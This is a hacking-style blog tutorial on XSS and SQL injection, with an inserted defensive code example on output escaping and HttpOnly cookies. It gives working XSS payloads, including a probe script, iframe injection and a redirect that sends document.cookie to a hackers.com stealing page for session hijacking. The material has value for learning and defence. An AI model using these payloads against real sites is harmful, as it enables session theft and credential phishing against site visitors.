Cross-site scripting (popularly known as XSS) and SQL injection errors are two prominent vulnerabilities that have been responsible for a large number of security breaches in recent years. XSS is a huge problem today, as many web developers are not even aware of this kind of attack. The basic differences between SQL injection and XSS are:
- SQL injection is the injection of SQL statements, whereas XSS is the injection of code (it can be JavaScript, PHP code, VB code or even regular HTML).
- SQL injection is injecting a SQL statement into the query execution function in the server-side script. XSS, however, can be both client and server side (stored or persistent XSS is server side, whereas non-persistent XSS is client side, as the attacker needs to insert the code each time).
Together, XSS and SQL injection are the most deadly combination that can be found today, and more than 90% of sites are vulnerable to at least one of the two. In SQL injection, the user can add additional conditions or commands to a database query, thus allowing the user to bypass authentication or alter data. With XSS, an attacker can inject his own HTML (including JavaScript or other executable code) into a web page; this is exploitable in many ways, up to complete compromise of the browser. XSS is used by a phisher to inject credential-stealing code into official sites without having to redirect the user to a copy of the site. This means that any security credentials will be valid on the attack site and even white-listing will not prevent the attack.
So, let's look at how an XSS attack actually takes place.
XSS attacks can be of many types:
- Non-persistent or reflected
- DOM-based or local cross-site scripting
- Stored or persistent
Now have a look at an example. Let's say that we have a vulnerable page. A malicious user, Hacker, posts a "special_code" post containing the following:
<script type="text/javascript" src="http://victimwebsite.com/xss.js"></script>
If the page is vulnerable, then for everyone who visits the page, the browser will fetch the file located at http://victimwebsite.com/xss.js and execute the code in it.
How to find if a website is vulnerable to XSS?
To find out if a website is vulnerable to XSS, what you need to do is just insert the following script into any search or input text field:
<script>alert("hi");</script>
If, upon submitting, the page returns an alert with "hi" in it, then that particular website is likely vulnerable to an XSS attack.
Now you can insert a link to any third-party website or fake login page in the script tag, and that link gets stored with the original content. We can also insert links to JavaScript files, which will allow the hacker to run malicious code included in the JavaScript upon page reload and basically hijack the session of any user accessing that particular page. Session hijacking refers to the fact that the hacker can now log into the website without even knowing the victim's username or password. This is done by inserting cookie-stealing code in the JavaScript.
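The alert("hi") test above works because the page reflects the input back as live markup. The following added example (not code from the original post) shows a minimal server-side renderer with that defect beside its fixed form, plus the cookie attributes that stop document.cookie theft; the function names, the probe string and the cookie value are constructed for illustration.

```javascript
// Added example: vulnerable vs. fixed reflection of a search query, and a
// session cookie set so that script cannot read it. Not from the original post.

// Encode the five characters that can change the HTML context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable: the untrusted query is concatenated straight into the page,
// so <script>alert("hi");</script> arrives in the browser as a script tag.
function renderUnsafe(query) {
  return '<h1>Results for: ' + query + '</h1>';
}

// Fixed: the same page with the query HTML-encoded before insertion;
// the browser now shows the probe as text instead of executing it.
function renderSafe(query) {
  return '<h1>Results for: ' + escapeHtml(query) + '</h1>';
}

// Mirrors the manual check in the post: does the probe come back unchanged,
// i.e. as markup the browser would execute?
function reflectsMarkup(render, probe) {
  return render(probe).includes(probe);
}

// Session cookie header that blunts cookie theft via document.cookie:
// HttpOnly hides the cookie from script, Secure keeps it off plain HTTP,
// SameSite=Lax stops most cross-site requests from carrying it.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

const PROBE = '<script>alert("hi");</script>'; // constructed test input

console.log('unsafe page reflects markup:', reflectsMarkup(renderUnsafe, PROBE)); // true
console.log('safe page reflects markup:  ', reflectsMarkup(renderSafe, PROBE));   // false
console.log(renderSafe(PROBE));
console.log('Set-Cookie: ' + sessionCookieHeader('sid', 'constructed-session-id'));
```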
We can insert a link to any image into the vulnerable website by giving the following script in the search or text input field that is vulnerable to XSS:
<iframe src="url of the fake page" width="1000" height="1000" />
It can be anything like:
<iframe src="http://www.hacker.com/hacked.jpg" width="1000" height="1000" />
One can also redirect visitors of the victim website to another page:
<script>document.location.href="http://www.hackers.com/steal_cookies.php"+document.cookie;
</script>
Hope you enjoyed and learnt a lot.
Happy Hacking!
For any questions, leave a comment or contact me on Facebook.
Contact ==> www.facebook.com/ryan.manjothi